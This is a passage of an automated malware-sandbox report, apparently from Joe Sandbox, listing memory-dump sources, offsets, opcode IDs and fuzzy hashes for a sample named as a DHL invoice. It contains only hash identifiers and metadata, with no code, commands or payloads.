                                                                                                                • Instruction Fuzzy Hash: 9A214C74E0820DDFCB14DFA9D4846AEBBB6BB45300F60C569D805A7350D7349A82DF95
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2036075757.0000000000A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a50000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: dac320e80a65be344de66340c36666b272c1d6a601ededa3ade09839d0392631
                                                                                                                • Instruction ID: 5ed04c77387d0a0afdb1c86928e27e3ebc7fb6d9a5128270e784eaf14c2134c9
                                                                                                                • Opcode Fuzzy Hash: dac320e80a65be344de66340c36666b272c1d6a601ededa3ade09839d0392631
                                                                                                                • Instruction Fuzzy Hash: 1121FFB0908208DFDB44EFA9D4887BDBBF1FB59306F56C4A5D819A3351E7744A88DB01
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2035854451.000000000098D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0098D000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_98d000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 95a418c59dc185f5eb52964804b6a8af75e22175c095de8d9b3726cda9605365
                                                                                                                • Instruction ID: ee39112abd508cc9928ea78f1ae6b63ce9c292db95870be068d0bc3735b735f7
                                                                                                                • Opcode Fuzzy Hash: 95a418c59dc185f5eb52964804b6a8af75e22175c095de8d9b3726cda9605365
                                                                                                                • Instruction Fuzzy Hash: AA21807550A3C08FCB12DF24D994716BF71EB86314F2981DAD8458B697C33AD81ACB62
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2050337889.0000000005C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C20000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_5c20000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 5750aaa69faa5d3d10f34ea807b138cce0ee410a10d1d3c707d42c9a451106dc
                                                                                                                • Instruction ID: 0bc3059ea87e401f9ccd14f28400afccde02449e559b8708a2afff10b953926c
                                                                                                                • Opcode Fuzzy Hash: 5750aaa69faa5d3d10f34ea807b138cce0ee410a10d1d3c707d42c9a451106dc
                                                                                                                • Instruction Fuzzy Hash: 2211A5307092949FC705DB69C49096E7BB6AFD674172580EAE009CF362DE31ED06DBA1
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2050337889.0000000005C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C20000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_5c20000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 51445277545354031f6648262bfbd09353caaab9c7d14f96058e83eeef91d479
                                                                                                                • Instruction ID: 3441f84538545f668a5941531ee495c0c27ee6521036365cf9caa16c7967d1c7
                                                                                                                • Opcode Fuzzy Hash: 51445277545354031f6648262bfbd09353caaab9c7d14f96058e83eeef91d479
                                                                                                                • Instruction Fuzzy Hash: 7D218078A42269AFCB14CF68D594EADBBF2BF49700F104454F902AB360CB34AD41DF50
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2050337889.0000000005C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C20000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_5c20000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 6e24772bb9d1321f4daea15fed8e380007f6586c8c5822e356b8575f031f1de3
                                                                                                                • Instruction ID: a245425123f0962650d4ff2185dd7fae94fd376176a0820092a4c05d951f82fd
                                                                                                                • Opcode Fuzzy Hash: 6e24772bb9d1321f4daea15fed8e380007f6586c8c5822e356b8575f031f1de3
                                                                                                                • Instruction Fuzzy Hash: 1511A035B002549FCB60DB6998457BA7BF2FB88A01F144829E906D7380DF35D902CFA0
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2050306783.0000000005C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C10000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_5c10000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: ac5609702313540b744779fb3b792001ecc51cedff35000ef5ee63b80e713c99
                                                                                                                • Instruction ID: 975b24b03b6fe5fc111a12355f8b6f0ae2ff44dc2642eef026397450d103e494
                                                                                                                • Opcode Fuzzy Hash: ac5609702313540b744779fb3b792001ecc51cedff35000ef5ee63b80e713c99
                                                                                                                • Instruction Fuzzy Hash: 66212970E05218DFDB18CF6AD844BD9BAF6FB8A300F1480AAE85DA7250CB700984DF05
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2050337889.0000000005C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C20000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_5c20000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: cd12fdfbf4856fcdb230ba9c0134a202dac46d13cfcb2d780678c7a6fb457605
                                                                                                                • Instruction ID: 6ae342266cd14046105905d17b17ba4f94de16fd7f606a80cee472c3f43b374a
                                                                                                                • Opcode Fuzzy Hash: cd12fdfbf4856fcdb230ba9c0134a202dac46d13cfcb2d780678c7a6fb457605
                                                                                                                • Instruction Fuzzy Hash: 6101F5336082A86FD754CA98E044AEABFF4FB44720F2488EBF584DB250D635EA80C750
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2050337889.0000000005C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C20000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_5c20000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 6cfaf2203f391ca5bb8ab4ad3032d319e6795a6b9f6818d30d66772cf650d2ba
                                                                                                                • Instruction ID: d1505198f4779e9f08ce2d9ba3a1f91883e52c39ada5ec0a1593f3dacc679e21
                                                                                                                • Opcode Fuzzy Hash: 6cfaf2203f391ca5bb8ab4ad3032d319e6795a6b9f6818d30d66772cf650d2ba
                                                                                                                • Instruction Fuzzy Hash: 0C01287490D208EFC711DFA4D84469DBFB4EB47300F2194DBE844A7361EA719B01DBA1
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2050337889.0000000005C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C20000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_5c20000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 681694ac24cea40716979d529ee4c8509d790bd79a3020cbc036d02e229660b8
                                                                                                                • Instruction ID: b471ff5f46e1638894f1bc95ceb03904187b27665aabf2d2eafae2d00276c998
                                                                                                                • Opcode Fuzzy Hash: 681694ac24cea40716979d529ee4c8509d790bd79a3020cbc036d02e229660b8
                                                                                                                • Instruction Fuzzy Hash: 57117035B002559FDB60CB6898467B97BF2BB48A01F14486AE916D7281DB35D902CFA0
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2050337889.0000000005C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C20000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_5c20000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: b541872fc7c39239e7a9983f4fc2fc70806204e3515e3bfdd2cdc6d3684a4556
                                                                                                                • Instruction ID: 24fae03d5497cd216c1117450db334ec1ba33cc42bb4bc09dfed90ef93effb95
                                                                                                                • Opcode Fuzzy Hash: b541872fc7c39239e7a9983f4fc2fc70806204e3515e3bfdd2cdc6d3684a4556
                                                                                                                • Instruction Fuzzy Hash: 4801AC3A340314AFD7108F59DC84F9B77A9FB89721F108026FA04CB290CB71D8109B50
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2036075757.0000000000A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a50000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 77fb90e5d904e065c5ba453ceb1667397b298a8583e276bd19a3b2126af2b2ab
                                                                                                                • Instruction ID: 355ac9f974cf0a780942d5a00ec51c3913363629ba5c23a20b0bd4b9e51a763a
                                                                                                                • Opcode Fuzzy Hash: 77fb90e5d904e065c5ba453ceb1667397b298a8583e276bd19a3b2126af2b2ab
                                                                                                                • Instruction Fuzzy Hash: 9B01A4225496E14FE702AB3C98795E63FA09E5722470E00F3D484CF277E91A8C4AC7D2
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2050914473.0000000006230000.00000040.00000800.00020000.00000000.sdmp, Offset: 06230000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_6230000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 9a04cc2353072ce091f5b338e07fd66ddf44b74447b4cb06af2e37b31ec6f1c7
                                                                                                                • Instruction ID: 4a9c3e570986d598179b305d373fd0fabbe0002a4b8954e76da1319ec8037aae
                                                                                                                • Opcode Fuzzy Hash: 9a04cc2353072ce091f5b338e07fd66ddf44b74447b4cb06af2e37b31ec6f1c7
                                                                                                                • Instruction Fuzzy Hash: 9311B7B4E002099FDB48DFA9C9457AEFBF5BF88300F2084699418A7354DA319A419B91
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2050337889.0000000005C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C20000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_5c20000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 495b5e54ff6f0ad2aa05142776a27f0ad2d83cad9f65fc4088d636f337663418
                                                                                                                • Instruction ID: 6cd716f82f97f1539a241fa60b332074d416603229d8e0042ec7e51d141ec3b0
                                                                                                                • Opcode Fuzzy Hash: 495b5e54ff6f0ad2aa05142776a27f0ad2d83cad9f65fc4088d636f337663418
                                                                                                                • Instruction Fuzzy Hash: 42F04676B083105FD3154759E81076ABBBAFFCB320F16446AE949DB391CA67AC418BA0
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2035800022.000000000097D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0097D000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_97d000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 610146afcf536581ffa3108f76402b4320dd336cff437c03a097fd14b3ee2ae7
                                                                                                                • Instruction ID: e61f2b67b66220b1466be0db196e0f68be1e71a2bcf7eafad875711d0fecffc8
                                                                                                                • Opcode Fuzzy Hash: 610146afcf536581ffa3108f76402b4320dd336cff437c03a097fd14b3ee2ae7
                                                                                                                • Instruction Fuzzy Hash: 4001A7B200A3449AE7144A15D9C4767FFECEF51764F18C529ED0D4A186D379D840CA71
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2050337889.0000000005C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C20000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_5c20000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 3dbc0cdd36f24ae41855406be990f57079e144d19d9ca482c6157585e8fbab88
                                                                                                                • Instruction ID: e5b7392bf322f1276f8cdf8af733718691f7e8e096818c5c9cbe8c80ebb5b737
                                                                                                                • Opcode Fuzzy Hash: 3dbc0cdd36f24ae41855406be990f57079e144d19d9ca482c6157585e8fbab88
                                                                                                                • Instruction Fuzzy Hash: 6A01F9377100189FC7149B29D8459ADB7AAEFC4224B0440B6ED19C7320DA30DD13CB91
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2050306783.0000000005C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C10000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_5c10000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: ce016079b986fee7d6d9e45ce1b8e591ce43996b82daa82114a7cb4aa1ae4303
                                                                                                                • Instruction ID: 91cdc2ec7d63dfe93d3f6f074a3ce267a902e2d1391f6f3ade44d0005ac02e2b
                                                                                                                • Opcode Fuzzy Hash: ce016079b986fee7d6d9e45ce1b8e591ce43996b82daa82114a7cb4aa1ae4303
                                                                                                                • Instruction Fuzzy Hash: E111F8749086188FDB64DF24DC54AAABBF2BF4A301F4455EA980EE7361DB315E82CF01
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2050306783.0000000005C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C10000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_5c10000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 82c7eff7e05f2a50d2fed2d6fe632ffc516cb858e2718dde1f3dabdee71ca59e
                                                                                                                • Instruction ID: 464c435bc96d6fe43dcd7ce49951f041fbfddac10aed92096b727fda03b4dff3
                                                                                                                • Opcode Fuzzy Hash: 82c7eff7e05f2a50d2fed2d6fe632ffc516cb858e2718dde1f3dabdee71ca59e
                                                                                                                • Instruction Fuzzy Hash: C50140B4E092098FDB54DFB9C4806AEBFF2FB45300F14956AD409E3351E7344681DB41
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2050337889.0000000005C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C20000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_5c20000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 420d396d4e01b73aa96c3501b869b91bae1c9312964f6dc1c46b7935219f00ce
                                                                                                                • Instruction ID: c5f8b49e73d4ae89c9937ba8d14b57e4e7fa0a612ff1158d8133c48efae93467
                                                                                                                • Opcode Fuzzy Hash: 420d396d4e01b73aa96c3501b869b91bae1c9312964f6dc1c46b7935219f00ce
                                                                                                                • Instruction Fuzzy Hash: 6F0171393005149BD3159B24D458A2B7BA6FB89711F108168E5068B790CF75EC02CBD2
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2050337889.0000000005C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C20000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_5c20000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 17fc1d55f52fa5639bec1270040947d19fe8f35d9ff510795639f04f940739c4
                                                                                                                • Instruction ID: 6e20010af415977ca7c3d7c04d87eb24cd0ce5c4ca18e94a57a3f7c72255e225
                                                                                                                • Opcode Fuzzy Hash: 17fc1d55f52fa5639bec1270040947d19fe8f35d9ff510795639f04f940739c4
                                                                                                                • Instruction Fuzzy Hash: 7DF062313001109FC7049A2AD894F6AF7DAFBC8754B548179E609CB366DA36DC01C7E2
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2050306783.0000000005C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C10000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_5c10000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 25987657bf004dea6cb083d7a246bf7158beeb4b8c98d33564a7563cc6f00e6c
                                                                                                                • Instruction ID: 2aa15ba41ac332b102e844ece6b098fb913963eef0547864487653410aa5a672
                                                                                                                • Opcode Fuzzy Hash: 25987657bf004dea6cb083d7a246bf7158beeb4b8c98d33564a7563cc6f00e6c
                                                                                                                • Instruction Fuzzy Hash: DD01F6B1D19209DFCB40DFA8D8856AEBBF4EB09301F2045A9E80AE3351E7754A81DB51
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2050337889.0000000005C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C20000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_5c20000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 615d5c363e5be746ba8e0c78563fbf34b8c8d4a544a93d4321c328df4560ebff
                                                                                                                • Instruction ID: 0c1d205dc4ce1ee1b5ae5404cf1aacd06ac02fad7673f18e23ab1a87653d177f
                                                                                                                • Opcode Fuzzy Hash: 615d5c363e5be746ba8e0c78563fbf34b8c8d4a544a93d4321c328df4560ebff
                                                                                                                • Instruction Fuzzy Hash: 47F0AF312003049FC7218F58D980E9AFBA6EF95310B158A3AE8568B365DB70AD4D8B50
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2050337889.0000000005C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C20000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_5c20000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 4f1354d39aef06a4e7264e6f5738bd481f1599900afed57075c5df09d30aa59e
                                                                                                                • Instruction ID: 1a7a82e320fb2cf7ff57eb887077a27f262b882c342215a77093ee4f51afb9ce
                                                                                                                • Opcode Fuzzy Hash: 4f1354d39aef06a4e7264e6f5738bd481f1599900afed57075c5df09d30aa59e
                                                                                                                • Instruction Fuzzy Hash: 110181393405149FC718DB24D05892ABBA6FBCC711B108528F9068B790CF31EC42CBD5
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2050337889.0000000005C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C20000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_5c20000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 57ec762bb01e3c96027f6b3f091c99ef9fcaff664d55d46647afdfecc5b18234
                                                                                                                • Instruction ID: 1757c327a12489ed2ea69223bfa55eebaa00661cf145cbe96f3e70e9a64b3cc1
                                                                                                                • Opcode Fuzzy Hash: 57ec762bb01e3c96027f6b3f091c99ef9fcaff664d55d46647afdfecc5b18234
                                                                                                                • Instruction Fuzzy Hash: 86F02466B4D3A14FE32207785C10325AFE2ABD6210F1948EAD482CF2A6D997E802C751
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2050337889.0000000005C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C20000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_5c20000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 2c5c91304c9b55c25c255a2067a8e39e74782dc52c387e82424815ffce2da0f4
                                                                                                                • Instruction ID: f4a8a58cb884a6d2ec6a5dd275bb79952be73ee10888f2ff40f8423c78561aa8
                                                                                                                • Opcode Fuzzy Hash: 2c5c91304c9b55c25c255a2067a8e39e74782dc52c387e82424815ffce2da0f4
                                                                                                                • Instruction Fuzzy Hash: A0F090393047509FC3118F69D884D8ABBBAFF8A61570644AAF545CB321DB71D8049B60
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2050337889.0000000005C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C20000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_5c20000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: d31021b25a05d6193288b1e654b06eee709f1b8f03109076b26a82070e72c987
                                                                                                                • Instruction ID: a5cd823bef847697a7d7e04b5702eba1755d9a5b974579bf87ab6c107ad00601
                                                                                                                • Opcode Fuzzy Hash: d31021b25a05d6193288b1e654b06eee709f1b8f03109076b26a82070e72c987
                                                                                                                • Instruction Fuzzy Hash: A4F0B4A270E2924FC712072D6C50368FBB1EF56648F5545AAD981C7367D6109D054B91
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2050337889.0000000005C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C20000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_5c20000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: a5bbb230ca0453b02257b147a25921d2232a83c9a60a44d69b54353dadf08d0a
                                                                                                                • Instruction ID: 2d30f9a072fbab2982ce90a8bf570d8ce531366236738c1bc8aeeb71aa71ae8b
                                                                                                                • Opcode Fuzzy Hash: a5bbb230ca0453b02257b147a25921d2232a83c9a60a44d69b54353dadf08d0a
                                                                                                                • Instruction Fuzzy Hash: 16F0E975B443215FE3148759980072BF7E9FBC9720F144829E90A9B354CAB6BC418BD4
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2035800022.000000000097D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0097D000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_97d000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: b932530e1f992295e972c6f8f3cdd41fecb49afedbfdc380442d2cad45dd28da
                                                                                                                • Instruction ID: 1bb8ef1a1e19e812f9138e0ab136d7cc1a53b5c225fc04fc60b3c68faedba9e3
                                                                                                                • Opcode Fuzzy Hash: b932530e1f992295e972c6f8f3cdd41fecb49afedbfdc380442d2cad45dd28da
                                                                                                                • Instruction Fuzzy Hash: 14F062724093449EE7148A16D8C4B62FFACEF51724F18C55AED4C4A286C3799C44CA71
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2050306783.0000000005C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C10000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_5c10000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: aa5e7bd8e1ae6244eb9975d4b3d56015d69484c9b753d67f2109a31bbb0efa99
                                                                                                                • Instruction ID: 0b3e97b30644b4ac35c157cf5af0af800129d55775d420f33de5788872981dba
                                                                                                                • Opcode Fuzzy Hash: aa5e7bd8e1ae6244eb9975d4b3d56015d69484c9b753d67f2109a31bbb0efa99
                                                                                                                • Instruction Fuzzy Hash: 7011CEB09102288FEB69DF65D98DBDCB6B0BB06300F1045EAE909A7291CB744AC1CF45
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2050337889.0000000005C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C20000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_5c20000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 7f25942a2dedd257fc83f00f551d3eb38c8c48f55b150a1a0f6720309f01700a
                                                                                                                • Instruction ID: de8a062f23f2adc5259f050074af8bb9863a9b75c78119cf51ab6dbd3cb33122
                                                                                                                • Opcode Fuzzy Hash: 7f25942a2dedd257fc83f00f551d3eb38c8c48f55b150a1a0f6720309f01700a
                                                                                                                • Instruction Fuzzy Hash: C7F06D3A310200AFD7149B29D848F2A7BAAFFC9710F054469F9468B3A0CB71EC02CB91
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2050914473.0000000006230000.00000040.00000800.00020000.00000000.sdmp, Offset: 06230000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_6230000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 1e2db41bfafa16107d05fa3d9044583d87856850b186d31fb0ad86bf27a83720
                                                                                                                • Instruction ID: 08e06a6ce420449c1741652a7ca683d58cae40be94885794bcde8e24a71deba4
                                                                                                                • Opcode Fuzzy Hash: 1e2db41bfafa16107d05fa3d9044583d87856850b186d31fb0ad86bf27a83720
                                                                                                                • Instruction Fuzzy Hash: 5511BA74A05228CFDB64DF28C885A9ABBF5FB48300F40C2E9991DA7794DB745E81CF11
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2050337889.0000000005C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C20000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_5c20000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 0b77e60e33ff259addc8875d1a0acdddf0fd19ba65d0493989d782de1624672a
                                                                                                                • Instruction ID: 4e55b3d403edf3bfb7e71168ec3e5af8053db461d638c6f738c0f82bf31cee4d
                                                                                                                • Opcode Fuzzy Hash: 0b77e60e33ff259addc8875d1a0acdddf0fd19ba65d0493989d782de1624672a
                                                                                                                • Instruction Fuzzy Hash: 9AF090B2A05304AFC711CB65D882AD97BB5EB55200F4584E9E408DB301EA316E02D791
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2050306783.0000000005C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C10000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_5c10000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
